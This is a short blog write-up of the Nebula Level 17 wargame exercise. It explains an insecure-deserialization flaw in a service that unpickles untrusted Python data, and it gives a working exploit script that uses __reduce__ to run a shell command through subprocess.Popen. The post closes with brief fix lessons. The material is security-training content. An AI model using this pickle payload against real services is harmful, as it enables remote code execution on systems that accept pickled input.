blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 17

Problem

  1. Data from untrusted sources is accepted!
  2. A library is used, that is known to execute given code.

Please see blog.nelhage.com for more information.

Exploit

The exploit is straight forward if you read the blog entry from above.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/python

import subprocess
import socket
import pickle

cmd = 'getflag >/tmp/flag17'

class Getflag(object):
        def __reduce__(self):
                return(subprocess.Popen,((cmd,),))

host = '127.0.0.1'
port = 10007

o = Getflag()
pickled_o= pickle.dumps(o)
print pickled_o

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((host, port))
res = s.recv(1024)
s.send(pickled_o)

To see the flag just execute cat /tmp/flag17.

Lesson / How to fix

  1. Only accept data from trusted sources!
  2. Read the documentation! It is vital that one understands the api of ones sourcecode.

other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19